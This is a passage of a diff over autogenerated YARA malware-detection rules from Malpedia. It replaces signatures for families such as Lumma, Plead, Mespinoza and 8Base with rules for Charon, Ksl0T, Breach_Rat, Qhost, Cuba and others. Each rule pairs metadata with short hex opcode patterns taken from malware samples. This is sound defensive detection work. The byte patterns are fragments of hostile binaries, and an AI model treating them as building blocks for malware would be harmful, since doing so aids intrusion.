-		$sequence_10 = { e8???????? 85c0 740c 418bdd e9???????? 4983cfff }
-		$sequence_11 = { 33d2 41b808020000 6644896d80 e8???????? 488b3d???????? 33c0 }
-		$sequence_12 = { 3bd7 89542410 750d 57 }
-		$sequence_13 = { 89831c0c0000 eb15 8d4601 50 e8???????? 89831c0c0000 83c404 }
-		$sequence_14 = { 4833c4 48894537 4c8b25???????? 33c0 c745d701234567 8945a3 }
-		$sequence_15 = { 8bfe 83e03f c1ff06 6bd830 8b04bd80f17300 f644032801 }
-		$sequence_16 = { c1f906 6bf630 8b0c8d80f16e00 80643128fd 5f 5e }
-		$sequence_17 = { 6a26 58 0fb60c8536976e00 0fb6348537976e00 8bf9 8985b4f8ffff c1e702 }
-		$sequence_18 = { 6bd030 895de4 8b049d80f17300 8945d4 }
-		$sequence_19 = { 89855cf5ffff 0f84df040000 8d8618030000 50 8d85f4fbffff }
-		$sequence_20 = { 83e809 7443 83e801 0f8501010000 c745e0e4ba6e00 8b4508 8bcf }
-		$sequence_21 = { c645e316 ff15???????? 410fb7cd 668945e4 }
-		$sequence_22 = { 8b2d???????? 50 ffd5 8d942480000000 52 ff15???????? }
-		$sequence_23 = { 83f808 74ba 83f807 77c5 ff2485d1a86d00 8bce }
-		$sequence_24 = { f3ab 66ab 33c0 8d4c2404 89442409 51 }
-		$sequence_25 = { 448bc7 4803ce e8???????? 8d7709 488b5310 }
-		$sequence_26 = { 4c89642440 4c896c2438 488d3576a50100 4c8d056ba50100 }
-		$sequence_27 = { 663944244d 0f8593010000 488d4f10 4c8d442458 488d542458 448bce }
-		$sequence_28 = { 8d3c85c8f46e00 8b0f 85c9 740b }
-		$sequence_29 = { c6442412ed c644241396 c644241425 c644241528 c6442416fd }
-		$sequence_30 = { 8b04c520986e00 5d c3 33c0 }
-		$sequence_31 = { 56 83f815 0f8711010000 ff2485786b6d00 51 8d5106 }
-		$sequence_32 = { e8???????? 83c40c c785e0f3ffff00040000 8d85e0f3ffff 50 }
-		$sequence_33 = { 5d c3 b801000000 ebc5 b988130000 }
-		$sequence_34 = { 55 6a00 6a00 8d442410 6a1a }
-		$sequence_35 = { eb57 53 8b1c85d8886e00 56 6800080000 6a00 }
-		$sequence_36 = { e8???????? 29bb50000500 448bd8 3bbb54000500 }
-		$sequence_37 = { 88442419 c644241a13 c644241b0e c644241c5d c644241d9f }
-		$sequence_38 = { 48f7d1 4c8d0409 488d4dc0 e8???????? 4c8d4c2440 }
-		$sequence_39 = { 50 ff15???????? 837e0c00 8bf8 0f840a010000 8d8e18030000 51 }
-		$sequence_40 = { 428b4c8440 0f1f440000 3b8c8440010000 7419 48ffc0 }
-		$sequence_41 = { 41b800800000 e8???????? 81834c0005000080ffff 8183440005000080ffff }
-		$sequence_42 = { 6800010000 8db318010000 6a00 56 e8???????? 6800010000 }
-		$sequence_43 = { 8bf8 0f84df020000 8d8318030000 50 8d85bcf7ffff }
+		$sequence_0 = { e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? }
+		$sequence_1 = { 8d8d4cffffff e8???????? 6a00 ff15???????? }
+		$sequence_2 = { 6801000080 ff15???????? 85c0 7408 ff15???????? }
+		$sequence_3 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? }
+		$sequence_4 = { eb08 8b4520 8b4d0c 8908 }
+		$sequence_5 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 }
+		$sequence_6 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff }
+		$sequence_7 = { e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? }
+		$sequence_8 = { e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 }
+		$sequence_9 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? }
 
 	condition:
-		7 of them and filesize < 393216
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Lumma_Auto : FILE
+rule MALPEDIA_Win_Charon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "18aafe26-24fd-5a9a-bbc9-ae4c88d965fc"
+		id = "01b8556c-ee40-53b7-952a-8e2b8282fe20"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lumma_auto.yar#L1-L194"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.charon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.charon_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "5ba9e6acd0a483b46312a1312db0d7f170a01587be01ff146763c3e3b48ae6c9"
+		logic_hash = "b28dd8515b960c3adbfdc7b51b8085f45af8b6d7308fa151efcf52d4fa2fa9ad"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -121655,45 +121628,34 @@ rule MALPEDIA_Win_Lumma_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 ff767c ff7678 ff7644 }
-		$sequence_1 = { ffd0 83c40c 894648 85c0 }
-		$sequence_2 = { 894604 8b461c c1e002 50 }
-		$sequence_3 = { ff7678 ff7644 ff563c 83c414 }
-		$sequence_4 = { 833800 740a e8???????? 833822 }
-		$sequence_5 = { 66894316 0fb7560e 0fb74e0c e8???????? }
-		$sequence_6 = { 66894338 8b4626 89433c 8b462a }
-		$sequence_7 = { 8b4610 894320 8b4614 894328 }
-		$sequence_8 = { e8???????? 83c40c 6a02 6804010000 e8???????? }
-		$sequence_9 = { 017e78 83567c00 017e68 83566c00 }
-		$sequence_10 = { 83f900 75f1 83ec04 8b4508 e8???????? 89ec 5d }
-		$sequence_11 = { 31c0 837e3808 0f94c0 294628 }
-		$sequence_12 = { 0f94c3 89d5 09cd 0f95c7 }
-		$sequence_13 = { 0f95c7 30df 7514 837e6c00 }
-		$sequence_14 = { 8b5204 45 8b4208 45 8b4a0c 49 83fe04 }
-		$sequence_15 = { 01e8 56 ff742424 50 }
-		$sequence_16 = { 50 57 ff7618 e8???????? 83c40c 894618 }
-		$sequence_17 = { 01c9 39dd ba00000000 19c2 72f1 }
-		$sequence_18 = { 234608 7418 8b8684000000 29f8 }
-		$sequence_19 = { 31ed 89ae88000000 c7868c00000000000000 899e80000000 833e00 }
-		$sequence_20 = { 8b550c 6bd204 89d1 83e904 8b5510 8b1c0a }
+		$sequence_0 = { 8b4c2420 8d0c8d01000000 4863c9 88440c50 b803000000 2b442420 4898 }
+		$sequence_1 = { 050b020000 8bc0 488b8c2460020000 8b0481 038424f8010000 8b8c24fc010000 8b942400020000 }
+		$sequence_2 = { 480bc1 48c1f802 4825ffffff01 b908000000 486bc901 488b542408 }
+		$sequence_3 = { 486bc000 488b8c2460020000 8b840140100000 c1e00a b904000000 486bc900 488b942460020000 }
+		$sequence_4 = { 48c1e108 480bc1 b901000000 486bc90e 488b542410 0fb60c0a 48c1e110 }
+		$sequence_5 = { c784249c00000000000000 8b0424 8b4c2408 03c8 }
+		$sequence_6 = { 488b942460020000 8b8c0a40100000 c1e916 0bc1 898424d8010000 b804000000 486bc00f }
+		$sequence_7 = { 050f020000 8bc0 488b8c2460020000 8b0481 03842438020000 8b8c243c020000 8b942440020000 }
+		$sequence_8 = { 0bc1 89442448 b804000000 486bc004 488b8c2460020000 0fb6840100100000 88442443 }
+		$sequence_9 = { 48c744243000000000 8b8424c0000000 89442428 488b842430010000 4889442420 448b8c24f0000000 }
 
 	condition:
-		7 of them and filesize < 1115136
+		7 of them and filesize < 254976
 }
-rule MALPEDIA_Win_Plead_Auto : FILE
+rule MALPEDIA_Win_Ksl0T_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ea1e32f2-faad-594a-a682-0f661211cc9b"
+		id = "38d6ccea-2477-53a3-80c5-72d7cca1e17c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.plead_auto.yar#L1-L223"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ksl0t_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "e24e1751ade86b382e488f87af3eb86584ff682352dde27167e20cbed17a20c8"
+		logic_hash = "d56faacde84036ddaab537f194f3df4539ee4dbdadae9af8318bac8df1d8305a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -121705,46 +121667,38 @@ rule MALPEDIA_Win_Plead_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 897d14 e8???????? 83c40c 8d4514 }
-		$sequence_1 = { 8b4514 56 881c30 ff15???????? }
-		$sequence_2 = { 40 50 6a01 ff15???????? 83c40c }
-		$sequence_3 = { 90 0145fc ff75fc ff15???????? }
-		$sequence_4 = { 53 6a05 ff7508 ff15???????? }
-		$sequence_5 = { 3bf7 740f ebda 33f6 }
-		$sequence_6 = { 50 8b4518 03c6 57 }
-		$sequence_7 = { ebda 33f6 c745fcf8ffffff 3bf7 750c 895dfc }
-		$sequence_8 = { 40 49 8975fc 75ec 8bc6 5e }
-		$sequence_9 = { 81c900ffffff 41 85c9 7e1c 55 }
-		$sequence_10 = { 33c0 81c418020000 c21000 8b84241c020000 6a00 6a00 6801020000 }
-		$sequence_11 = { 50 ff15???????? 33c0 81c418020000 }
-		$sequence_12 = { 7cf1 ffd3 8b35???????? 2bc7 3de8030000 760f }
-		$sequence_13 = { 8844341c 46 3bf1 7cf1 }
-		$sequence_14 = { c145fc05 8b75fc 33d2 8a10 03f2 40 }
-		$sequence_15 = { 6804010000 ff15???????? 8b4c2412 8b54240e 8b44240c }
-		$sequence_16 = { 648b1530000000 8b520c 8b521c 8b5a08 }
-		$sequence_17 = { eb02 8bfa 8955f4 897df0 }
-		$sequence_18 = { 8dbd00ffffff 33db 891f 0fb602 42 }
-		$sequence_19 = { 85c0 750f 6800800000 6a00 ff75f8 ff5648 eb0d }
-		$sequence_20 = { d3e0 f7c200000004 7403 80cc02 }
-		$sequence_21 = { 75f1 5e 8b4624 03c3 668b1450 }
-		$sequence_22 = { 8b562c c7048a00000000 8b7df0 8b07 }
-		$sequence_23 = { 8b4510 40 c1c803 ab 3bef }
+		$sequence_0 = { 44895c2440 897c2438 89542430 894c2428 89442420 488d15a8cb0000 }
+		$sequence_1 = { 4885c9 7405 e8???????? 488b8ba0000000 488d057f5c0000 483bc8 7405 }
+		$sequence_2 = { 48894c2408 4883ec18 c744240400000000 8b4c2404 8b442428 }
+		$sequence_3 = { c68424e700000020 889c24e8000000 888424e9000000 c68424ea0000002d c68424eb00000002 888c24ec000000 c64424381a }
+		$sequence_4 = { 83c008 898424f4080000 448b05???????? 49d1e0 }
+		$sequence_5 = { c644243331 c644243439 c644243539 884c2436 }
+		$sequence_6 = { c684248600000067 88942487000000 c684248800000031 c684248900000039 c684248a00000039 }
+		$sequence_7 = { 488b442450 8138a0000000 7470 833d????????00 7528 }
+		$sequence_8 = { 6800020000 57 8d95000d0000 52 }
+		$sequence_9 = { 888c24fd000000 c68424b000000012 888424b1000000 889c24b2000000 c68424b300000019 c68424b400000034 }
+		$sequence_10 = { 889c2451020000 c684245202000073 c68424530200006c c684245402000065 c68424550200006e c684245602000000 }
+		$sequence_11 = { 488d0d67a70000 e8???????? 488d1556aa0000 4c8d050f3d0000 488d4c38de 41b903000000 482bd1 }
+		$sequence_12 = { c68424eb00000018 c68424ec0000003a c68424ed00000031 c68424ee00000020 c68424ef00000039 c68424f000000030 }
+		$sequence_13 = { c68424f80200006c c68424f902000073 c68424fa02000074 c68424fb02000072 }
+		$sequence_14 = { 390424 7d46 48630c24 488b442428 440fbe0408 4863442420 33d2 }
+		$sequence_15 = { 33c9 66898d60060000 6806020000 51 8d9562060000 52 e8???????? }
 
 	condition:
-		7 of them and filesize < 8224768
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Mespinoza_Auto : FILE
+rule MALPEDIA_Win_Breach_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "64606785-caad-5456-be9c-a6b69cbeed8d"
+		id = "c23c3fa3-17cd-5c37-b04d-874bf808dbb3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mespinoza_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.breach_rat_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "8fedbfda9801fec8b36b08d0047fda05662354c890294b93f8c3d358064016b8"
+		logic_hash = "f6957c0f2edc673a234b7e2f6939826a76594123ef28991fd2cfa30c71d906d4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121758,32 +121712,32 @@ rule MALPEDIA_Win_Mespinoza_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a02 6a00 68???????? 6802000080 ff15???????? 8b15???????? }
-		$sequence_1 = { 894de4 399860554700 0f84ea000000 41 83c030 894de4 3df0000000 }
-		$sequence_2 = { 6a00 ff5014 c20800 55 8bec 83c1f8 }
-		$sequence_3 = { 40 8945d4 8bd8 0f1f00 ff75e0 8b17 }
-		$sequence_4 = { e8???????? 8d8d98efffff e8???????? 8b4df4 }
-		$sequence_5 = { 897de4 33db 895dfc 895dd4 81fb80000000 7d4d 8b049d00b04700 }
-		$sequence_6 = { 3347fc 0be8 83ea01 75f0 8b5c2420 896c2410 eb08 }
-		$sequence_7 = { c6430900 83630c00 c703???????? 8a00 884310 eb02 33db }
-		$sequence_8 = { 0f57c0 c745fc00000000 660fd64604 6aff 8d4e10 c706???????? c7460c04000000 }
-		$sequence_9 = { e8???????? 8bd8 33c9 8bc6 895dc8 f7e7 }
+		$sequence_0 = { 2b4da4 f7e9 c1fa02 8bc2 c1e81f 03c2 744a }
+		$sequence_1 = { 8b450c 2bf0 83c002 0345f0 56 50 eb08 }
+		$sequence_2 = { 8d4db8 e8???????? 83c410 84c0 742c 8b4dd4 }
+		$sequence_3 = { ff4dc4 895d08 0f8548fdffff 8b5d98 8b7d9c 85db }
+		$sequence_4 = { c745bc00000000 c645ac00 56 8bd7 c645fc0b 8d8d6cffffff e8???????? }
+		$sequence_5 = { 8bc2 c1e81f 03c2 83f807 7616 8d87a8000000 3bf0 }
+		$sequence_6 = { 53 57 8b7d08 33db 895df0 85ff 7464 }
+		$sequence_7 = { e8???????? 8bc8 e8???????? 8d8d24f1ffff c745fcffffffff e8???????? 68???????? }
+		$sequence_8 = { e8???????? 50 8d8c2480000000 e8???????? 8b442428 85c0 7416 }
+		$sequence_9 = { 68???????? 8d8d54f7ffff e8???????? 68???????? 8d8554f7ffff c745fcc8000000 50 }
 
 	condition:
-		7 of them and filesize < 1091584
+		7 of them and filesize < 645120
 }
-rule MALPEDIA_Win_8Base_Auto : FILE
+rule MALPEDIA_Win_Qhost_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c4b48847-5291-521d-93fb-9294f21140e6"
+		id = "f6a3ef66-17d7-58a0-96de-8a0c0984b5c6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.8base"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.8base_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.qhost_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "b47a40948bded147073cdef65076e2a74aedf9d527ccdea9c267a440037e5b0f"
+		logic_hash = "905b65375bd0a4c7552598ebcf914fdc02a2fd215e8f336ecf0dd12d8b466ba7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121797,32 +121751,32 @@ rule MALPEDIA_Win_8Base_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 ff15???????? 8d8e04a2feff 81f98c230000 770b }
-		$sequence_1 = { 8b5104 8b4c2408 c74432f45c394000 5e }
-		$sequence_2 = { 8815???????? c605????????6f 880d???????? c605????????65 c605????????63 }
-		$sequence_3 = { 8d3485c0289100 8b06 83e71f c1e706 03c7 8a5824 }
-		$sequence_4 = { c684249c00000002 50 c7442410043a4000 e8???????? }
-		$sequence_5 = { d3ea 89542414 8b442434 01442414 8b442424 31442410 }
-		$sequence_6 = { ff15???????? 8b442414 40 3d???????? 89442414 0f8c0effffff 8b35???????? }
-		$sequence_7 = { 8bf7 83e61f c1e606 033485c0289100 c745e401000000 }
-		$sequence_8 = { 6689442416 33c9 668954241a 8d442434 50 66894c241c 8b4c241c }
-		$sequence_9 = { 899c24ac000000 3bfb 7449 8b8424b8000000 56 8d742418 }
+		$sequence_0 = { b8???????? eb0c 8b4dfc 51 ff15???????? }
+		$sequence_1 = { 6a04 8d55f0 52 6a07 8b4508 50 }
+		$sequence_2 = { 50 68???????? 68???????? 680f270000 68???????? }
+		$sequence_3 = { 7430 6a00 6a02 8d55f8 52 6a23 ff55fc }
+		$sequence_4 = { 894da0 8b55a0 3b55a4 0f8d56040000 8d459c }
+		$sequence_5 = { 6880000000 6a00 8d8d74feffff 51 e8???????? 83c40c 8b9570feffff }
+		$sequence_6 = { e8???????? 83c404 e9???????? 83bd68ffffff06 7536 83bd6cffffff00 752d }
+		$sequence_7 = { 52 8b45fc 50 ff15???????? eb4a }
+		$sequence_8 = { 8b8ddcfdffff 51 ff15???????? 83c404 8b95ecfdffff 52 e8???????? }
+		$sequence_9 = { 50 6800040000 8d8d00fcffff 51 8b95c8fbffff 52 }
 
 	condition:
-		7 of them and filesize < 10838016
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Unidentified_100_Auto : FILE
+rule MALPEDIA_Win_Cuba_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "46aeb4db-19b2-5469-a0eb-5c4c4a4bf0ff"
+		id = "86d7ccf5-17e2-58df-93e2-25197c1f8e94"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_100"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_100_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cuba_auto.yar#L1-L160"
 		license_url = "N/A"
-		logic_hash = "47aac890cf0ac352426261b33fabc1042e2b5071c52a28784cdba5465d5e39a5"
+		logic_hash = "06e63a9dd7221f555e50b6728a34cba72d1d2d067337f699676a2804a6a34058"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121836,32 +121790,38 @@ rule MALPEDIA_Win_Unidentified_100_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb6442420 2580000000 88442402 0fb6442420 }
-		$sequence_1 = { 488b542420 88040a 6b05????????03 0fb60c24 03c1 4898 488b4c2420 }
-		$sequence_2 = { 8d0c8d03000000 4863c9 488b542448 4c8b442440 410fb60400 88040a }
-		$sequence_3 = { 488d9424a0070000 488d8c24a0050000 e8???????? 8b442434 ffc0 eb3d }
-		$sequence_4 = { 3da5000000 751b 48630424 488b4c2478 c6040146 48630424 }
-		$sequence_5 = { 488b8c24c0000000 4c8b442468 420fb60c01 e8???????? 0fb6c0 8b4c242c 33c8 }
-		$sequence_6 = { 488bf1 b932000000 f3a4 488d842402030000 }
-		$sequence_7 = { 488b8c24c0000000 4c8b842480000000 420fb60c01 e8???????? 0fb6c0 8b4c2438 33c8 }
-		$sequence_8 = { 742d 4c8d4c2460 41b802000000 488d542464 488b4c2448 ff15???????? 8b442460 }
-		$sequence_9 = { c744841001000000 e9???????? 48630424 488b4c2470 0fb60401 83f82b 751e }
+		$sequence_0 = { 85c0 7810 3de4000000 7309 8b04c510704100 5d }
+		$sequence_1 = { c3 8bff 55 8bec 8b4d08 33c0 3b0cc5905d4100 }
+		$sequence_2 = { 0019 43 41 00444341 }
+		$sequence_3 = { 8bd6 c745ac749f4100 8bce 0fb707 }
+		$sequence_4 = { 000d???????? 384100 b538 41 }
+		$sequence_5 = { 0026 45 41 003a }
+		$sequence_6 = { 0026 43 41 00b043410062 }
+		$sequence_7 = { 0012 45 41 0026 }
+		$sequence_8 = { 83e801 0f8501010000 c745e004934100 8b4508 }
+		$sequence_9 = { ff24953c354000 c7878c00000001000000 85c9 747e 3bc6 730a }
+		$sequence_10 = { 660fc5c400 25f0070000 660f28a040974100 660f28b830934100 660f54f0 660f5cc6 660f59f4 }
+		$sequence_11 = { ffd7 85c0 750c e8???????? 5f }
+		$sequence_12 = { 000c43 41 0035???????? 43 }
+		$sequence_13 = { 003a 45 41 004245 }
+		$sequence_14 = { 7414 8d85c0f9ffff 50 56 ff15???????? 85c0 75e6 }
+		$sequence_15 = { 000446 41 00d1 45 }
 
 	condition:
-		7 of them and filesize < 372736
+		7 of them and filesize < 1094656
 }
-rule MALPEDIA_Win_Batchwiper_Auto : FILE
+rule MALPEDIA_Win_Graphsteel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8e0f816b-f334-5f53-bde8-8c13e5a1573a"
+		id = "fd70cca8-a56d-5225-a00e-9e9a8f58f3be"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.batchwiper_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.graphsteel_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "7b7cda4dab9bb8ec218294d77768f35a5d54eba78e3d583128b9f7cf9e6690f0"
+		logic_hash = "e3e7b2c9268861fa25138183cb28ca132ae718be8ddf794ff818ae9183996560"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121875,34 +121835,34 @@ rule MALPEDIA_Win_Batchwiper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 50 50 ff742408 e8???????? 8d0d2cb14000 5a }
-		$sequence_1 = { 8d0d24b14000 5a e8???????? c744240c02000000 }
-		$sequence_2 = { a1???????? 50 50 ff35???????? ff35???????? e8???????? 8d0d9cb14000 }
-		$sequence_3 = { 8d0d44b14000 e8???????? ba???????? 8d0d48b14000 e8???????? ba???????? 8d0d4cb14000 }
-		$sequence_4 = { ff96e0de0100 09c0 7407 8903 }
-		$sequence_5 = { e8???????? a3???????? 8b1d???????? 21db 7e65 c705????????00000000 8b1d???????? }
-		$sequence_6 = { e8???????? ba???????? 8d0d60b14000 e8???????? ba???????? 8d0d64b14000 e8???????? }
-		$sequence_7 = { 893d???????? c705????????dd424000 c705????????80464000 c705????????da464000 }
-		$sequence_8 = { 8b442408 894514 8b442404 894518 }
-		$sequence_9 = { 46 46 53 686d490100 57 }
+		$sequence_0 = { c3 488d0584215d00 bb10000000 e8???????? 4889f8 b900200000 e8???????? }
+		$sequence_1 = { 8b842490000000 85c0 0f84e8feffff 488d4c2470 e8???????? 4489e0 4881c4b0000000 }
+		$sequence_2 = { 664189856c010000 498b8528010000 4885c0 7407 c7401807000000 4c89e9 4531e4 }
+		$sequence_3 = { e8???????? 660f1f840000000000 4885c9 0f8425040000 48f7c160000000 7404 31d2 }
+		$sequence_4 = { ff15???????? 807e6900 7472 8b4628 85c0 7e4e 31db }
+		$sequence_5 = { e9???????? 488d7101 4839f7 732b 488d0533c23600 e8???????? 488d7301 }
+		$sequence_6 = { 488d6c2430 48897c2420 48894c2450 48895c2448 4889442428 488d05cd4f4b00 e8???????? }
+		$sequence_7 = { eb0c 488d3d1e448600 e8???????? 488b0d???????? 48898c24f0020000 488d0533115500 e8???????? }
+		$sequence_8 = { 90 488b5c2468 488b4c2470 488d3d96682100 4889c6 4531c0 4531c9 }
+		$sequence_9 = { bb1a000000 e8???????? 0f1f440000 e8???????? 488d0594745400 488d1d8deb6400 e8???????? }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 19812352
 }
-rule MALPEDIA_Win_Olympic_Destroyer_Auto : FILE
+rule MALPEDIA_Win_Shadow_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4acd0027-92fe-500e-bf15-82d11cf7dd70"
+		id = "cd866f0d-a058-5516-ad44-83c67b926cef"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.olympic_destroyer_auto.yar#L1-L227"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadow_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shadow_rat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "04c4fa0edf97b10dccc92d5a353a5a44b42a7347836f6e32d55d1c64914c31af"
+		logic_hash = "f9ac6b211213f8898a8d9a850cbd590282d120dd08d8f19a3ecf3df1330c81a4"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -121914,45 +121874,32 @@ rule MALPEDIA_Win_Olympic_Destroyer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 33c0 89542414 57 }
-		$sequence_1 = { 85c0 7453 8b44242c 8d4c2410 }
-		$sequence_2 = { ffd7 85c0 0f848c000000 68???????? 8d85c0f9ffff 50 }
-		$sequence_3 = { 8985d4f7ffff 8d8580f7ffff 56 50 89b5d8f7ffff }
-		$sequence_4 = { 51 8bce 8b4004 894510 e8???????? 8b4d10 }
-		$sequence_5 = { 51 8bcf 89442424 e8???????? 8b542424 }
-		$sequence_6 = { 51 8bcb 8975c4 e8???????? 83c404 8945e4 }
-		$sequence_7 = { 83e801 743e 83e805 756d 50 50 8b4104 }
-		$sequence_8 = { 8945fc 53 56 8d45e8 33f6 50 8975e8 }
-		$sequence_9 = { ff15???????? 85c0 0f88ac000000 6a00 }
-		$sequence_10 = { 51 8bce 8d52ff e8???????? 83c408 85c0 0f851f040000 }
-		$sequence_11 = { 51 8bce 8944244c 89bc2480000000 }
-		$sequence_12 = { 3bc6 742a 0185f0efffff 8b85ecefffff }
-		$sequence_13 = { a4 4a 40 00d0 4a 40 }
-		$sequence_14 = { ff74241c ff15???????? 5f 33c0 5e 40 5b }
-		$sequence_15 = { 0f8794020000 ff2485bc4b5500 51 8d542454 e8???????? 83c404 85c0 }
-		$sequence_16 = { 8b6c2424 55 6a40 ff15???????? 89442418 85c0 }
-		$sequence_17 = { 51 8bcb e8???????? 8a45dc }
-		$sequence_18 = { 89442414 e8???????? 85c0 7415 8d4e08 }
-		$sequence_19 = { 89442430 8b442444 89442434 751f }
-		$sequence_20 = { 51 8bce e8???????? 6a00 68???????? }
-		$sequence_21 = { 50 ffd7 85c0 747a ffb590f9ffff e8???????? eb5f }
-		$sequence_22 = { 56 ff15???????? 6880ee3600 ff15???????? }
+		$sequence_0 = { 488b8580000000 483bc6 0f82f1060000 482bc6 49c7c0ffffffff }
+		$sequence_1 = { 5f c3 488b542468 488d0db6590300 e8???????? 4c8b18 }
+		$sequence_2 = { e8???????? 448ba570010000 8b4c2438 488d15b7e5fcff 2b4c2448 41b826000000 894c2438 }
+		$sequence_3 = { 488b8c2430010000 4833cc e8???????? 4881c448010000 415e 415c 5e }
+		$sequence_4 = { 488d5570 4883bd880000000f 490f47d5 4533e4 4c89642420 4533c9 448b8580000000 }
+		$sequence_5 = { 488bf1 48894c2428 488bea 7603 488b2a 4c8b6210 48899c2480010000 }
